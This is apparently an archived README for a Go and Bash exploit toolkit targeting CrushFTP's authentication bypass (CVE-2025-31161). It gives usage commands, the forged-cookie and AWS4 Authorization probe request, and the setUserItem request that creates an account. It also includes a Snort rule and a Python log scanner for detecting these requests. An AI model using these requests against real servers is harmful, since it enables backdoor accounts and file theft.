POC details: 12e70c57808d0606fa170381ddbc49bc3de74ba9

Source
Related vulnerability
Title: CrushFTP security vulnerability (CVE-2025-31161)
Description: CrushFTP is a file transfer server from the company CrushFTP. CrushFTP 10.x versions before 10.8.4 and 11.x versions before 11.3.1 contain a security vulnerability that stems from an authentication bypass and may lead to account takeover.
Introduction
# CrushFTP Authentication Bypass - CVE-2025-31161

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![CVE](https://img.shields.io/badge/CVE-2025--31161-red.svg)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
[![Go](https://img.shields.io/badge/Go-1.20+-blue.svg)](https://golang.org/)
[![Bash](https://img.shields.io/badge/Bash-4.0+-green.svg)](https://www.gnu.org/software/bash/)

A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.

## 🔍 What is CVE-2025-31161?

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.

### Technical Details
- **CVSS Score**: TBD
- **Affected Software**: CrushFTP Web Interface
- **Attack Vector**: Network
- **Authentication Required**: None
- **Impact**: Complete system compromise through unauthorized account creation

## 🚀 Features

- **Multi-Language Support**: Go and Bash implementations
- **Smart Vulnerability Detection**: Automatically checks if target is vulnerable before exploitation
- **Interactive Mode**: Prompts for credentials only when target is confirmed vulnerable
- **Custom Port Support**: Configurable port for different deployment scenarios
- **Educational Focus**: Designed for CTF challenges and security research

## 📁 Repository Structure

```
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License
```

## 🛠️ Installation & Requirements

### Prerequisites

#### For Go Version (Recommended)
```bash
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
```

#### For Bash Version
```bash
# Requires curl (usually pre-installed)
sudo apt install curl
```


### Quick Setup
```bash
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
```

## 🎯 Usage

### Go Version (Recommended)
```bash
# Basic usage (default port 80)
go run cve-2025-31161.go --target_host example.com

# Custom port
go run cve-2025-31161.go --target_host example.com --port 8080

# Custom target user (default: crushadmin)
go run cve-2025-31161.go --target_host example.com --target_user admin
```

### Bash Version
```bash
# Basic usage
./cve-2025-31161.sh --target_host example.com

# Custom port
./cve-2025-31161.sh --target_host example.com --port 8080

# View help
./cve-2025-31161.sh --help
```


## 🔄 How It Works

```mermaid
flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I[Prompt for Username]
    I --> J[Prompt for Password]
    J --> K[Send Warm-up Request]
    K --> L[Craft User Creation Payload]
    L --> M[Send setUserItem Request]
    M --> N{User Created Successfully?}
    N -->|Yes| O[Success: Account Created]
    N -->|No| P[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style O fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style P fill:#ffcdd2
```

## 🧪 Exploit Flow Explained

### Step 1: Vulnerability Detection
The script first sends a `getUserList` request to check if the target is vulnerable:
```http
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
```

### Step 2: User Account Creation
If the target is vulnerable, the script sends a `setUserItem` request carrying a crafted XML payload:
```http
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
```

### Step 3: Verification
The script checks for `<response_status>OK</response_status>` in the response to confirm successful user creation.

---
## ⚠️ Vulnerability Details

### Root Cause
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.

### Impact Assessment
- **Confidentiality**: HIGH - Unauthorized access to file system
- **Integrity**: HIGH - Ability to modify/upload files
- **Availability**: MEDIUM - Potential for resource exhaustion

### Attack Scenarios
1. **Initial Access**: Create backdoor accounts for persistent access
2. **Privilege Escalation**: Create admin-level accounts
3. **Data Exfiltration**: Access sensitive files through FTP interface
4. **Lateral Movement**: Use compromised FTP server as pivot point

---
## 🛡️ Detection & Mitigation

### Detection Methods
- Monitor for unusual `setUserItem` requests in web logs
- Check for new user accounts created outside normal processes
- Implement anomaly detection for authentication bypass patterns

### Mitigation Strategies
1. **Immediate**: Block access to `/webinterface/function/` endpoints
2. **Short-term**: Update to a patched CrushFTP version (10.8.4 or later for 10.x, 11.3.1 or later for 11.x, per the advisory above)
3. **Long-term**: Implement proper authentication controls

### Network Signatures
```
# Snort/Suricata rule example. The setUserItem parameters of the Step 2 request
# travel in the POST body, so they are matched with http_client_body rather than
# http_uri; the endpoint path itself is matched in the URI.
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"/webinterface/function/"; http_uri; content:"command=setUserItem"; http_client_body; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)
```
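A log-side companion to the detection methods and the signature above, added here as an example and not part of this toolkit: it parses HTTP request records in a constructed reverse-proxy/WAF capture format (request line, headers, blank line, body; CrushFTP's own log format is not shown on this page) and flags requests to `/webinterface/function/` that issue `getUserList` or `setUserItem`, that carry the `AWS4-HMAC-SHA256` Authorization header seen in the Step 1 request, or that write an account, reporting the `username` so it can be checked against normal provisioning. The sample records are constructed from the Step 1 and Step 2 requests; the host name is a placeholder.

```python
"""Scan HTTP request records for the CrushFTP web-interface request pattern
described in Steps 1 and 2. Added example, not code from this toolkit.
Record format (constructed): request line, header lines, blank line, body."""
from urllib.parse import parse_qs, urlsplit

WEB_INTERFACE_PATH = "/webinterface/function/"
# Commands the documented exploit flow issues without a real session.
ADMIN_COMMANDS = {"getUserList", "setUserItem"}

# Constructed sample records: a benign page load, then requests shaped like
# Step 1 and Step 2 above. Host name is a placeholder.
SAMPLE_RECORDS = [
    "GET /webinterface/ HTTP/1.1\n"
    "Host: ftp.example.test\n"
    "User-Agent: Mozilla/5.0\n\n",
    "GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV HTTP/1.1\n"
    "Host: ftp.example.test\n"
    "Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV\n"
    "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/\n\n",
    "POST /webinterface/function/ HTTP/1.1\n"
    "Host: ftp.example.test\n"
    "Content-Type: application/x-www-form-urlencoded\n\n"
    "command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser"
    "&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If\n",
]


def parse_request(raw: str) -> dict:
    """Split one raw request into method, path, merged query/body params and headers."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, *_ = lines[0].split(" ")
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = parse_qs(url.query)
    # Form bodies carry the command for the Step 2 request; merge them in.
    if method == "POST" and headers.get("content-type", "").startswith(
        "application/x-www-form-urlencoded"
    ):
        params.update(parse_qs(body.strip()))
    return {"method": method, "path": url.path, "params": params, "headers": headers}


def analyze(req: dict) -> list[str]:
    """Return the indicators found in one parsed request (empty list if none)."""
    if req["path"] != WEB_INTERFACE_PATH:
        return []
    indicators = []
    command = req["params"].get("command", [""])[0]
    if command in ADMIN_COMMANDS:
        indicators.append(f"admin command {command}")
    # S3-style Authorization header on a web-interface request, as in Step 1.
    if req["headers"].get("authorization", "").startswith("AWS4-HMAC-SHA256"):
        indicators.append("AWS4-HMAC-SHA256 Authorization header on web interface")
    if command == "setUserItem":
        user = req["params"].get("username", ["?"])[0]
        indicators.append(f"account write for username={user}")
    return indicators


def scan(records: list[str]) -> list[tuple[int, list[str]]]:
    """Analyze every record; return (record index, indicators) for those that hit."""
    hits = []
    for index, raw in enumerate(records):
        found = analyze(parse_request(raw))
        if found:
            hits.append((index, found))
    return hits


if __name__ == "__main__":
    for index, found in scan(SAMPLE_RECORDS):
        print(f"record {index}: " + "; ".join(found))
```

The body-based indicator only works where the logging tier retains POST bodies, which plain access logs usually do not; the command-in-URI and Authorization-header indicators survive in URI/header-only logs, and the extracted `username` values are the ones to reconcile against provisioning records per the second detection method above.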
---
## 🎓 Educational Use Cases

### CTF Scenarios
- **Web Application Security**: Understanding authentication bypass vulnerabilities
- **Penetration Testing**: Demonstrating real-world exploitation techniques
- **Red Team Exercises**: Simulating APT-style attacks

### Learning Objectives
- Understanding HTTP request manipulation
- XML injection techniques
- Authentication bypass methodologies
- Multi-language exploit development

## 🚨 Legal Disclaimer

⚠️ **IMPORTANT**: This tool is designed for:
- Educational purposes
- Authorized penetration testing
- CTF competitions
- Security research in controlled environments

**DO NOT USE** on systems without explicit written permission. Unauthorized access to computer systems is illegal and may result in severe legal consequences.

## 🤝 Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new feature'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Create a Pull Request

### Development Guidelines
- Follow existing code style
- Add comprehensive comments
- Test on multiple target environments
- Update documentation for new features

## 📝 Version History

| Version | Date | Changes |
|---------|------|---------|
| 1.0.0 | 2025-01-XX | Initial release with Go and Bash implementations |
| 1.1.0 | 2025-01-XX | Interactive mode and vulnerability detection |

## 📚 References

- [CVE-2025-31161 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31161)
- [CrushFTP Official Website](https://www.crushftp.com/)
- [OWASP Authentication Bypass](https://owasp.org/www-community/attacks/Authentication_bypass)
- [Original Research by Immersive Labs](https://github.com/Immersive-Labs-Sec/CVE-2025-31161)

---
## 📧 Contact

For questions, suggestions, or security concerns, please open an issue in this repository.
File snapshot

```
[4.0K] /data/pocs/12e70c57808d0606fa170381ddbc49bc3de74ba9
├── [4.8K] cve-2025-31161.go
├── [5.5K] cve-2025-31161.sh
└── [7.9K] README.md

0 directories, 3 files
```
Cached for you by the Shenlong bot
Notes
1. Accessing the POC through the source link is recommended.
2. If the source is unavailable or inaccessible, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.